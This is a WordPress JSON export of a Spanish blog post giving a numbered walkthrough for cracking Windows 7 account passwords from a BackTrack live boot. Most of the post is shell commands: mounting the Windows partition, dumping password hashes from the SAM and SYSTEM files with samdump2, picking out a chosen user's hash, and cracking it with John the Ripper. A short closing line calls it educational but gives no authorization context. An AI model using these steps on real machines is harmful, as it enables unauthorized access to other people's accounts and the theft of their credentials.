{"id":42,"date":"2013-11-17T21:56:15","date_gmt":"2013-11-17T21:56:32","guid":{"rendered":"https:\/\/073daaccess-granted-hacked.jpg"},"modified":"2015-07-16T18:39:40","modified_gmt":"2015-07-17T00:39:40","slug":"hack-de-contrasena-de-windows-7-con-backtrack-4-r2-o-bt5-r3","status":"publish","type":"post","link":"https:\/\/emanuelpaxtian.com\/blog\/hack-de-contrasena-de-windows-7-con-backtrack-4-r2-o-bt5-r3\/","title":{"rendered":"Hack de contrase\u00f1a de Windows 7 con Backtrack 4-R2 \u00f3 BT5-R3"},"content":{"rendered":"<p>En Windows NT\/2000\/XP\/2003\/VISTA\/7 las contrase\u00f1as se almacenan en el archivo\u00a0<strong>SAM<\/strong>(Security Account Manager). Este es el fichero que contiene los nombres de usuario y las contrase\u00f1as de todos los usuarios del sistema local, o incluso del dominio, si se trata de un controlador de dominio.<\/p>\n<p>El archivo\u00a0<strong>SAM y SYSTEM<\/strong>\u00a0se encuentra en la ruta\u00a0<strong>\\Windows\\System32\\config<\/strong><\/p>\n<p><em>Abrimos una Terminal o consola<\/em><\/p>\n<p><strong>PASO 1 :<\/strong>\u00a0Ahora listaremos las tablas de particiones con el siguiente comando:<\/p>\n<blockquote><p>root@bt: ~# fdisk -l<\/p><\/blockquote>\n<p>Observaremos algo asi<\/p>\n<blockquote><p>Device \u00a0 \u00a0 \u00a0 \u00a0 Boot \u00a0 \u00a0 Start \u00a0 \u00a0 \u00a0End Blocks \u00a0 \u00a0 id \u00a0 \u00a0 \u00a0 \u00a0 System<br \/>\n\/dev\/sda1 \u00a0 \u00a0 \u00a013 \u00a0 \u00a0 \u00a07784 \u00a0 \u00a0 \u00a0 62417920 \u00a0 \u00a0 \u00a07 \u00a0 \u00a0 \u00a0 HPFS\/NTFS<br \/>\n* \/dev\/sda2 \u00a0 \u00a0 \u00a026 \u00a0 \u00a0 23456 \u00a0 \u00a0 156623556 \u00a0 \u00a0 23 \u00a0 \u00a0 \u00a0HPFS\/NTFS<br \/>\n\/dev\/sda3 \u00a0 \u00a0 \u00a024 \u00a0 \u00a0 35217 \u00a0 \u00a0 \u00a044387444 \u00a0 \u00a0 45 \u00a0 \u00a0 \u00a0 LINUX<\/p><\/blockquote>\n<p><strong>PASO 2 :<\/strong>\u00a0Comando utilizado para crear un punto de montaje es:<\/p>\n<blockquote><p>root@bt: ~# mkdir \/mnt\/windows7<\/p><\/blockquote>\n<p><strong>PASO 3 :<\/strong>\u00a0Montaje de su partici\u00f3n NTFS con el comando:<\/p>\n<blockquote><p>root@bt: ~# mount -t ntfs \/dev\/sda2 \/mnt\/windows7<\/p><\/blockquote>\n<p><strong>PASO 4 :<\/strong>\u00a0Accedemos al directorio que creamos y montamos la partici\u00f3n de windows.<\/p>\n<blockquote><p>root@bt: ~# cd \/mnt\/windows7<\/p><\/blockquote>\n<p>Con el comando ls muestra el contenido de un directorio.<\/p>\n<blockquote><p>root@bt: \/mnt\/windows7# ls<\/p><\/blockquote>\n<p>Observamos que esta partici\u00f3n sea la correcta donde esta instalado windows<\/p>\n<p>Observe dos directorios User (ocupe el comando cd \/Users y despues ls para ver todos los usuarios), Windows siga con el siguiente paso.<\/p>\n<p>En caso de no observar estos directorios regrese al PASO 3 indicando la particion donde esta instalado windows<\/p>\n<p><strong>PASO 5<\/strong>\u00a0: Ahora accedemos al directorio donde se encuentra el SAM SYSTEM de Windows que es donde se almacenan los Hashes de contrase\u00f1as de los usuarios, ubicada en \/Windows\/System32\/config:<\/p>\n<blockquote><p>root@bt: \/mnt\/windows7# cd \/Windows\/System32\/config<\/p><\/blockquote>\n<p><strong>PASO 6 :<\/strong>\u00a0Utilice la herramienta \u201cSamdump\u201d para mover los hashes del archivo SAM en el archivo \u201cpass1\u2033.<\/p>\n<blockquote><p>root@bt: \/mnt\/windows7\/Windows\/System32\/config# samdump2 system sam &gt; \/root\/pass1<\/p><\/blockquote>\n<p><strong>PASO 7 :<\/strong>\u00a0A trav\u00e9s del \u201cgrep\u201d b\u00fasqueda de comandos del Administrador de hash en el archivo y guardarlo en otro archivo \u201cPASS2\u2033.<\/p>\n<blockquote><p>root@bt: \/mnt\/windows7\/Windows\/System32\/config# cat \/root\/pass1 | grep NOMBRE_USUARIO &gt; \/root\/pass2<\/p><\/blockquote>\n<p>NOMBRE_USUARIO = Es el usuario del que queremos obtener su contrase\u00f1a recuerde PASO 4<\/p>\n<p><strong>PASO 8 :<\/strong>\u00a0Use John The Ripper (jtr) en BT4 y (john) en BT5 para encontrar las contrase\u00f1as.<\/p>\n<blockquote><p>root@bt: \/mnt\/windows7\/Windows\/System32\/config# cd \/pentest\/passwords\/jtr<\/p><\/blockquote>\n<p><strong>PASO 9 :<\/strong>\u00a0Escriba .\/John para ver el formato y las distintas opciones.<\/p>\n<blockquote><p>root@bt: \/pentest\/passwords\/jtr# .\/John<\/p><\/blockquote>\n<p><strong>PASO 10 :<\/strong>\u00a0usar el hash NTLM as\u00ed que usamos el siguiente comando para descifrarlo.<\/p>\n<blockquote><p>root@bt: \/pentest\/passwords\/jtr# .\/john \u2013format=NT \/root\/pass2<br \/>\n\u00f3<br \/>\nroot@bt: \/pentest\/passwords\/jtr# .\/john \u2013format:NT \/root\/pass2<\/p><\/blockquote>\n<p>loades 1 password hash (NT MD5 [128\/128 SSE2 + 32\/32])<br \/>\ncontrase\u00f1a \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0NOMBRE_USUARIO<\/p>\n<p>Esta informaci\u00f3n est\u00e1 dise\u00f1ada con fines did\u00e1cticos y no nos hacemos responsables del mal uso que se le pueda dar.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>En Windows NT\/2000\/XP\/2003\/VISTA\/7 las contrase\u00f1as se almacenan en el archivo\u00a0SAM(Security Account Manager). Este es el fichero que contiene los nombres de usuario y las contrase\u00f1as de todos los usuarios del&hellip;<\/p>\n","protected":false},"author":1,"featured_media":468,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,15],"tags":[],"class_list":["post-42","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-hacking","category-windows"],"_links":{"self":[{"href":"https:\/\/emanuelpaxtian.com\/blog\/wp-json\/wp\/v2\/posts\/42","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/emanuelpaxtian.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/emanuelpaxtian.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/emanuelpaxtian.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/emanuelpaxtian.com\/blog\/wp-json\/wp\/v2\/comments?post=42"}],"version-history":[{"count":0,"href":"https:\/\/emanuelpaxtian.com\/blog\/wp-json\/wp\/v2\/posts\/42\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/emanuelpaxtian.com\/blog\/wp-json\/wp\/v2\/media\/468"}],"wp:attachment":[{"href":"https:\/\/emanuelpaxtian.com\/blog\/wp-json\/wp\/v2\/media?parent=42"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/emanuelpaxtian.com\/blog\/wp-json\/wp\/v2\/categories?post=42"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/emanuelpaxtian.com\/blog\/wp-json\/wp\/v2\/tags?post=42"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}